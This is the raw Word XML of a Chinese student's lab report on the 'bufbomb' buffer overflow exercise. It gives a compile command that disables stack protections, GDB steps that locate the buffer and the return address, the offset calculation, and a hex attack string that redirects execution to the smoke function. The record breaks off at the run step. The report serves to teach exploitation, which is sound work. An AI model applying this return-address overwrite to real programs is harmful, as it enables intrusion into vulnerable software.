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2E109B70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8124FC" w:rsidRPr="008124FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>缓冲区</w:t>
      </w:r>
      <w:r w:rsidR="008124FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>溢出攻击</w:t>
      </w:r>
      <w:r w:rsidR="00B04203">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04203">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">   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12F3A8DD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017222" w:rsidRPr="00017222">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00857C95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006034D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="006034D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>计科</w:t>
      </w:r>
      <w:r w:rsidR="006034D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">2407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7E617E04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6034D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>U202414802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44F4AA78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6034D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>朱俊瑞</w:t>
      </w:r>
      <w:r w:rsidR="006034D0"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487B3B46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5C3A02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>李海波</w:t>
      </w:r>
      <w:r w:rsidR="00F80CFC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646E3D9E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3B1954">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2026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1F0C8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>4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CE67E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>27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4C937636" w:rsidR="00BC3ED6" w:rsidRDefault="00996068" w:rsidP="00BC3ED6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通过分析一个程序（称为“</w:t>
      </w:r>
      <w:r w:rsidR="00BC3ED6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>缓冲区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>炸弹”）的构成和运行逻辑，加深对理论课中关于程序的机器级表示</w:t>
      </w:r>
      <w:r w:rsidR="008124FC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="008124FC" w:rsidRPr="00BC3ED6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>函数调用规则、栈结构</w:t>
      </w:r>
      <w:r w:rsidR="008124FC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>方面知识点的理解，增强反汇编、跟踪、分析、调试等能力</w:t>
      </w:r>
      <w:r w:rsidR="008124FC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00BC3ED6" w:rsidRPr="00BC3ED6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>加深对缓冲区溢出攻击原理、方法与防范等方面知识的理解和掌握；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32255F5C" w14:textId="502AE09D" w:rsidR="001251E2" w:rsidRDefault="00086807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实验环境：Ubuntu，GCC，GDB等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45763F3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BC3ED6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>缓冲区溢出攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222EA87A" w14:textId="43F44117" w:rsidR="00BC3ED6" w:rsidRPr="001B70DB" w:rsidRDefault="00BC3ED6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 w14:textId="3D24D575" w:rsidR="00D97493" w:rsidRDefault="00BC3ED6" w:rsidP="00D97493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对一个可执行程序“bufbomb” 实施</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3ED6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系列缓冲区溢出攻击(buffer overflow attacks)，也就是设法通过造成缓冲区溢出来改变该程序的运行内存映像(例如将专门设计的字节序列插入到栈中特定内存位置)和行为，以实现实验预定的目标。</w:t>
      </w:r>
      <w:r w:rsidR="00D97493" w:rsidRPr="009A03E6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bufbomb 目标程序在运行时使用</w:t>
      </w:r>
      <w:r w:rsidR="00D97493">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r w:rsidR="00D97493" w:rsidRPr="009A03E6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> getbuf读入一个字符串</w:t>
      </w:r>
      <w:r w:rsidR="00D97493">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。根据不同的任务，学生生成相应的攻击字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4987AC38" w14:textId="7E8439BA" w:rsidR="0081169A" w:rsidRPr="00BC3ED6" w:rsidRDefault="00BC3ED6" w:rsidP="0081169A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实验中需要针对目标可执行程序bufbomb,分别完成多个难度递增的缓冲区溢出攻击(完成的顺序没有固定要求)。按从易到难的顺序，这些难度级分别命名为smoke (level</w:t>
      </w:r>
      <w:r w:rsidR="00392803">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00720DCE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3ED6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">)、fizz (level </w:t>
      </w:r>
      <w:r w:rsidR="00720DCE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3ED6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00720DCE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00720DCE" w:rsidRPr="00BC3ED6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DB5719" w14:textId="05313F9C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>级</w:t>
      </w:r>
      <w:r w:rsidR="009A03E6" w:rsidRPr="000709DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> smoke</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427C300E" w14:textId="5847139B" w:rsidR="009A03E6" w:rsidRDefault="007D2CEF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正常情况下，</w:t>
      </w:r>
      <w:r w:rsidR="009A03E6" w:rsidRPr="009A03E6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getbuf函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r w:rsidR="009A03E6" w:rsidRPr="009A03E6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结束，执行最后的ret指令时，将取出保存于栈帧中的返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（断点）</w:t>
      </w:r>
      <w:r w:rsidR="009A03E6" w:rsidRPr="009A03E6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址并跳转至它继续执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>est</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数中调用g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>etbuf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处）</w:t>
      </w:r>
      <w:r w:rsidR="009A03E6" w:rsidRPr="009A03E6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要求</w:t>
      </w:r>
      <w:r w:rsidR="009A03E6" w:rsidRPr="009A03E6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将返回地址的值改为本级别实验的目标smoke函数的首条指令的地址，</w:t>
      </w:r>
      <w:r w:rsidRPr="009A03E6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A03E6" w:rsidRPr="009A03E6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getbuf函数返回时，跳转到smoke函数执行，即达到了实验的目标。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B396D1A" w14:textId="44EB409A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级</w:t>
      </w:r>
      <w:r w:rsidRPr="000709DD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fizz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27182169" w14:textId="3A869107" w:rsidR="00CC581B" w:rsidRPr="00A70535" w:rsidRDefault="00425106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</w:t>
      </w:r>
      <w:r w:rsidRPr="009A03E6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getbuf函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r w:rsidRPr="009A03E6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结束</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后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转到 fizz</w:t>
      </w:r>
      <w:r w:rsidRPr="009A03E6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处执行。与smoke的差别是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fizz函数有一个参数。</w:t>
      </w:r>
      <w:r w:rsidRPr="009A03E6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00425106">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fizz函数</w:t>
      </w:r>
      <w:r w:rsidR="00627002">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中比较了</w:t>
      </w:r>
      <w:r w:rsidRPr="00425106">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数val </w:t>
      </w:r>
      <w:r w:rsidR="00627002">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与 全局变量c</w:t>
      </w:r>
      <w:r w:rsidR="00627002">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>ookie</w:t>
      </w:r>
      <w:r w:rsidR="00627002">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值，只有两者相同（要正确打印v</w:t>
      </w:r>
      <w:r w:rsidR="00627002">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r w:rsidR="00627002">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）才能达到目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00425106">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134B33B7" w14:textId="77777777" w:rsidR="00720DCE" w:rsidRDefault="00720DCE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0F5948EB" w14:textId="7BBCC129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7F3BED39" w:rsidR="00EE6B56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实验任务的实验记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8604B8" w14:textId="35C9D046" w:rsidR="003052C0" w:rsidRPr="003241AB" w:rsidRDefault="003052C0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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075AF3BA" w14:textId="77777777" w:rsidR="004007C9" w:rsidRPr="004007C9" w:rsidRDefault="004007C9" w:rsidP="004007C9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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004007C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1. 编译生成可执行程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4744E330" w14:textId="72E78757" w:rsidR="004007C9" w:rsidRPr="004007C9" w:rsidRDefault="004007C9" w:rsidP="004007C9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 w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>本人</w:t>
      </w:r>
      <w:r w:rsidRPr="004007C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>学号 U202414802（末位为 2），使用以下编译命令生成 bufbomb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>可执行程序</w:t>
      </w:r>
      <w:r w:rsidRPr="004007C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730CEAA4" w14:textId="373FFB8F" w:rsidR="003241AB" w:rsidRDefault="004007C9" w:rsidP="004007C9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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>gcc -g -fno-stack-protector -no-pie -fcf-protection=none -z execstack -D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004007C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>U2 verinfo.c bufbomb.c buf.c -o bufbomb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4757E0DC" w14:textId="77777777" w:rsidR="004007C9" w:rsidRDefault="004007C9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6BC10E34" w14:textId="77777777" w:rsidR="004007C9" w:rsidRPr="004007C9" w:rsidRDefault="004007C9" w:rsidP="004007C9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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004007C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2. smoke（第 0 级）攻击记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CD285F" w14:textId="00A1260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 w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（1）获取关键地址和偏移</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1192869A" w14:textId="7777777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 w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在 GDB 中调试程序：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D427D5D" w14:textId="7777777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606F5314" w14:textId="7777777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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>gdb ./bufbomb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D31C34" w14:textId="7777777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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(gdb) break getbuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EDCCFC" w14:textId="77777777" w:rsidR="004007C9" w:rsidRP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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(gdb) run U202414802 smoke_hex.txt 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4710FD" w14:textId="516BCC04" w:rsidR="004007C9" w:rsidRDefault="004007C9" w:rsidP="004007C9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此时</w:t>
      </w:r>
      <w:r w:rsidRPr="004007C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>程序停在 getbuf 函数第一条语句处。执行以下命令获取信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C7670D" w14:textId="77777777" w:rsidR="0048113B" w:rsidRDefault="004007C9" w:rsidP="009C5253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007C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(gdb) print &amp;buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401F1060" w14:textId="629F657F" w:rsidR="00DC1546" w:rsidRDefault="00DC1546" w:rsidP="009C5253">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:leftChars="200" w:left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C1546">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(gdb) info frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053BF776" w14:textId="4ABED392" w:rsidR="004007C9" w:rsidRDefault="004007C9" w:rsidP="0048113B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:leftChars="200" w:left="420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6E615726" wp14:editId="2BF21152">
            <wp:extent cx="6135370" cy="7035165"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="497425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25085" name="图片 497425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0671" w14:textId="387408F4" w:rsidR="00C26739" w:rsidRP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从输出中获得：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B46AF74" w14:textId="56884E48" w:rsidR="00C26739" w:rsidRP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lastRenderedPageBreak/>
        <w:t>buf 起始地址：0x7fffffffd470</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19216D35" w14:textId="46301199" w:rsidR="00C26739" w:rsidRP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返回地址存放位置（saved rip）：0x7fffffffd4c8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409DB63E" w14:textId="3D1FF492" w:rsidR="00C26739" w:rsidRP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偏移量 = 0x7fffffffd4c8 - 0x7fffffffd470 = 0x58 = 88 字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBFB41F" w14:textId="7D6543C8" w:rsid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smoke 函数入口地址（程序输出）：0x401445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8B3C5A" w14:textId="77777777" w:rsidR="001A241B" w:rsidRDefault="00C26739" w:rsidP="001A241B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（2）构造攻击字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FBC119" w14:textId="792F6D91" w:rsidR="00C26739" w:rsidRPr="00C26739" w:rsidRDefault="00C26739" w:rsidP="001A241B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从 buf 开始写入 88 字节的填充（使用 0x</w:t>
      </w:r>
      <w:r w:rsidR="00A71094">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26739">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0），之后的 8 字节覆盖返回地址为 smok</w:t>
      </w:r>
      <w:r w:rsidR="001A241B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26739">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的入口地址（小端序）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2B915C" w14:textId="77777777" w:rsidR="00C26739" w:rsidRPr="00C26739" w:rsidRDefault="00C26739" w:rsidP="00C26739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smoke_hex.txt 内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66134B34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0D390959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60284DAF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05390ED1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78FA0C0A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2BACCA9A" w14:textId="77777777" w:rsidR="002473F5" w:rsidRP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 xml:space="preserve">00 00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D651208" w14:textId="77777777" w:rsidR="002473F5" w:rsidRDefault="002473F5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2473F5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>45 14 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40800574" w14:textId="5E43E2EA" w:rsidR="00C26739" w:rsidRDefault="00C26739" w:rsidP="002473F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C26739">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（前 5 行每行 16 字节 = 80 字节，第 6 行为剩余 8 字节填充，第 7 行为 0x401445 的小端序表示。）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1347568B" w14:textId="77777777" w:rsidR="003D0806" w:rsidRPr="003D0806" w:rsidRDefault="003D0806" w:rsidP="003D0806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3D0806">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（3）运行结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABF1289" w14:textId="3445F6D6" w:rsidR="003D0806" w:rsidRPr="003D0806" w:rsidRDefault="003D0806" w:rsidP="003D0806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运行命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391E8BC9" w14:textId="3F370ED3" w:rsidR="003D0806" w:rsidRDefault="003D0806" w:rsidP="003D0806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3D0806">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
